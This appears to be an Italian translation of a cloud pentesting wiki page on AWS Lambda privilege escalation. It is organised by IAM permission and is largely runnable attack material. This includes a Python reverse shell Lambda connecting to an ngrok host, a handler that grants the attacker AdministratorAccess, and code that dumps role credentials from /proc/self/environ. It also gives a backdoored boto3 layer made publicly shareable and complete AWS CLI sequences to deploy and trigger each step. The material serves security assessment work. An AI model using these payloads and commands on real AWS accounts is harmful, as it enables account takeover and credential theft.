lambda

Ulteriori informazioni su lambda in:

iam:PassRole, lambda:CreateFunction, (lambda:InvokeFunction | lambda:InvokeFunctionUrl)

Gli utenti con le autorizzazioni iam:PassRole, lambda:CreateFunction, e lambda:InvokeFunction possono aumentare i loro privilegi. Possono creare una nuova funzione Lambda e assegnarle un ruolo IAM esistente, concedendo alla funzione le autorizzazioni associate a quel ruolo. L'utente può quindi scrivere e caricare codice in questa funzione Lambda (ad esempio un reverse shell). Una volta configurata la funzione, l'utente può attivare la sua esecuzione e le azioni previste invocando la funzione Lambda tramite l'API AWS. Questo approccio consente efficacemente all'utente di eseguire attività in modo indiretto attraverso la funzione Lambda, operando con il livello di accesso concesso dal ruolo IAM associato ad essa.\

Un attaccante potrebbe sfruttare questo per ottenere una reverse shell e rubare il token:

import socket,subprocess,os,time
def lambda_handler(event, context):
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(('4.tcp.ngrok.io',14305))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(['/bin/sh','-i'])
time.sleep(900)
return 0

# Zip the rev shell
zip "rev.zip" "rev.py"

# Create the function
aws lambda create-function --function-name my_function \
--runtime python3.9 --role <arn_of_lambda_role> \
--handler rev.lambda_handler --zip-file fileb://rev.zip

# Invoke the function
aws lambda invoke --function-name my_function output.txt
## If you have the lambda:InvokeFunctionUrl permission you need to expose the lambda inan URL and execute it via the URL

# List roles
aws iam list-attached-user-policies --user-name <user-name>

Puoi anche abusare delle autorizzazioni del ruolo lambda dalla stessa funzione lambda. Se il ruolo lambda avesse abbastanza autorizzazioni, potresti usarlo per concederti i diritti di amministratore:

import boto3
def lambda_handler(event, context):
client = boto3.client('iam')
response = client.attach_user_policy(
UserName='my_username',
PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess'
)
return response

È anche possibile rivelare le credenziali del ruolo della lambda senza necessità di una connessione esterna. Questo sarebbe utile per le Lambdas isolate di rete utilizzate per compiti interni. Se ci sono gruppi di sicurezza sconosciuti che filtrano le tue shell inverse, questo pezzo di codice ti permetterà di rivelare direttamente le credenziali come output della lambda.

def handler(event, context):
sessiontoken = open('/proc/self/environ', "r").read()
return {
'statusCode': 200,
'session': str(sessiontoken)
}

aws lambda invoke --function-name <lambda_name> output.txt
cat output.txt

Impatto Potenziale: Privesc diretto al ruolo di servizio lambda arbitrario specificato.

iam:PassRole, lambda:CreateFunction, lambda:AddPermission

Come nello scenario precedente, puoi concederti il permesso lambda:InvokeFunction se hai il permesso lambda:AddPermission

# Check the previous exploit and use the following line to grant you the invoke permissions
aws --profile "$NON_PRIV_PROFILE_USER" lambda add-permission --function-name my_function \
--action lambda:InvokeFunction --statement-id statement_privesc --principal "$NON_PRIV_PROFILE_USER_ARN"

Impatto Potenziale: Privesc diretto al ruolo di servizio lambda arbitrario specificato.

iam:PassRole, lambda:CreateFunction, lambda:CreateEventSourceMapping

Gli utenti con le autorizzazioni iam:PassRole, lambda:CreateFunction, e lambda:CreateEventSourceMapping (e potenzialmente dynamodb:PutItem e dynamodb:CreateTable) possono escalare privilegi indirettamente anche senza lambda:InvokeFunction. Possono creare una funzione Lambda con codice dannoso e assegnarle un ruolo IAM esistente.

Invece di invocare direttamente la Lambda, l'utente configura o utilizza una tabella DynamoDB esistente, collegandola alla Lambda tramite un mapping della sorgente degli eventi. Questa configurazione garantisce che la funzione Lambda venga attivata automaticamente all'ingresso di un nuovo elemento nella tabella, sia per azione dell'utente che di un altro processo, attivando indirettamente la funzione Lambda ed eseguendo il codice con le autorizzazioni del ruolo IAM passato.

aws lambda create-function --function-name my_function \
--runtime python3.8 --role <arn_of_lambda_role> \
--handler lambda_function.lambda_handler \
--zip-file fileb://rev.zip

Se DynamoDB è già attivo nell'ambiente AWS, l'utente deve solo stabilire il mapping della sorgente degli eventi per la funzione Lambda. Tuttavia, se DynamoDB non è in uso, l'utente deve creare una nuova tabella abilitando lo streaming:

aws dynamodb create-table --table-name my_table \
--attribute-definitions AttributeName=Test,AttributeType=S \
--key-schema AttributeName=Test,KeyType=HASH \
--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \
--stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES

Ora è possibile connettere la funzione Lambda alla tabella DynamoDB creando un mapping della sorgente degli eventi:

aws lambda create-event-source-mapping --function-name my_function \
--event-source-arn <arn_of_dynamodb_table_stream> \
--enabled --starting-position LATEST

Con la funzione Lambda collegata allo stream DynamoDB, l'attaccante può attivare indirettamente la Lambda attivando lo stream DynamoDB. Ciò può essere realizzato inserendo un elemento nella tabella DynamoDB:

aws dynamodb put-item --table-name my_table \
--item Test={S="Random string"}

Impatto Potenziale: Privesc diretto al ruolo di servizio lambda specificato.

lambda:AddPermission

Un attaccante con questa autorizzazione può concedersi (o concedere ad altri) qualsiasi permesso (questo genera politiche basate sulle risorse per concedere l'accesso alla risorsa):

# Give yourself all permissions (you could specify granular such as lambda:InvokeFunction or lambda:UpdateFunctionCode)
aws lambda add-permission --function-name <func_name> --statement-id asdasd --action '*' --principal arn:<your user arn>

# Invoke the function
aws lambda lambda invoke --function-name <func_name> /tmp/outout

Impatto Potenziale: Privesc diretto al ruolo di servizio lambda utilizzato concedendo il permesso di modificare il codice e eseguirlo.

lambda:AddLayerVersionPermission

Un attaccante con questo permesso può concedersi (o concedere ad altri) il permesso lambda:GetLayerVersion. Potrebbe accedere al layer e cercare vulnerabilità o informazioni sensibili.

# Give everyone the permission lambda:GetLayerVersion
aws lambda add-layer-version-permission --layer-name ExternalBackdoor --statement-id xaccount --version-number 1 --principal '*' --action lambda:GetLayerVersion

Impatto Potenziale: Potenziale accesso a informazioni sensibili.

lambda:UpdateFunctionCode

Gli utenti che possiedono il permesso lambda:UpdateFunctionCode hanno il potenziale per modificare il codice di una funzione Lambda esistente collegata a un ruolo IAM. L'attaccante può modificare il codice della lambda per estrarre le credenziali IAM.

Anche se l'attaccante potrebbe non avere la capacità diretta di invocare la funzione, se la funzione Lambda è preesistente e operativa, è probabile che venga attivata attraverso flussi di lavoro o eventi esistenti, facilitando indirettamente l'esecuzione del codice modificato.

# Thezip should contain the lambda code (trick: DOwnload the current one and add your code there)
aws lambda update-function-code --function-name target_function \
--zip-file fileb:///my/lambda/code/zipped.zip

# If you have invoke permissions:
aws lambda invoke --function-name my_function output.txt

# If not check if it's exposed in any URL or via an API gateway you could access

Impatto Potenziale: Privesc diretta al ruolo di servizio lambda utilizzato.

lambda:UpdateFunctionConfiguration

Introduzione

Lambda Layers consente di includere codice nella funzione lambda ma memorizzandolo separatamente, in modo che il codice della funzione possa rimanere piccolo e diverse funzioni possano condividere il codice.

All'interno di lambda è possibile controllare i percorsi da cui il codice Python viene caricato con una funzione come la seguente:

import json
import sys

def lambda_handler(event, context):
print(json.dumps(sys.path, indent=2))

Questi sono i percorsi:

1. /var/task

2. /opt/python/lib/python3.7/site-packages

3. /opt/python

4. /var/runtime

5. /var/lang/lib/python37.zip

6. /var/lang/lib/python3.7

7. /var/lang/lib/python3.7/lib-dynload

8. /var/lang/lib/python3.7/site-packages

9. /opt/python/lib/python3.7/site-packages

10. /opt/python

Ad esempio, la libreria boto3 viene caricata da /var/runtime/boto3 (4a posizione).

Sfruttamento

È possibile abusare dell'autorizzazione lambda:UpdateFunctionConfiguration per aggiungere un nuovo layer a una funzione lambda. Per eseguire codice arbitrario, questo layer deve contenere una libreria che la lambda importerà. Se è possibile leggere il codice della lambda, potresti trovarlo facilmente, nota anche che potrebbe essere possibile che la lambda stia già utilizzando un layer e potresti scaricare il layer e aggiungere il tuo codice lì.

Ad esempio, supponiamo che la lambda stia utilizzando la libreria boto3, questo creerà un layer locale con l'ultima versione della libreria:

pip3 install -t ./lambda_layer boto3

Puoi aprire ./lambda_layer/boto3/__init__.py e aggiungere il backdoor nel codice globale (una funzione per esfiltrare credenziali o ottenere una shell inversa per esempio).

Successivamente, comprimi la directory ./lambda_layer e carica il nuovo strato lambda nel tuo account (o in quello della vittima, ma potresti non avere le autorizzazioni necessarie).

Nota che devi creare una cartella python e mettere le librerie al suo interno per sovrascrivere /opt/python/boto3. Inoltre, lo strato deve essere compatibile con la versione di Python utilizzata dalla lambda e se lo carichi nel tuo account, deve essere nella stessa regione:

aws lambda publish-layer-version --layer-name "boto3" --zip-file file://backdoor.zip --compatible-architectures "x86_64" "arm64" --compatible-runtimes "python3.9" "python3.8" "python3.7" "python3.6"

Ora, rendi il layer lambda caricato accessibile da qualsiasi account:

aws lambda add-layer-version-permission --layer-name boto3 \
--version-number 1 --statement-id public \
--action lambda:GetLayerVersion --principal *

E collega il lambda layer alla funzione lambda della vittima:

aws lambda update-function-configuration \
--function-name <func-name> \
--layers arn:aws:lambda:<region>:<attacker-account-id>:layer:boto3:1 \
--timeout 300 #5min for rev shells

Il passo successivo sarebbe o invocare la funzione noi stessi se possibile o aspettare che venga invocata tramite mezzi normali, che è il metodo più sicuro.

Un modo più stealth per sfruttare questa vulnerabilità può essere trovato in:

Impatto Potenziale: Privesc diretto al ruolo di servizio lambda utilizzato.

?iam:PassRole, lambda:CreateFunction, lambda:CreateFunctionUrlConfig, lambda:InvokeFunctionUrl

Forse con quei permessi sei in grado di creare una funzione ed eseguirla chiamando l'URL... ma potrei trovare un modo per testarlo, quindi fammi sapere se ci riesci!

Lambda MitM

Alcune lambda stanno ricevendo informazioni sensibili dagli utenti nei parametri. Se ottieni RCE in una di esse, puoi esfiltrare le informazioni che gli altri utenti stanno inviando ad essa, controlla in:

Riferimenti

• https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/

• https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/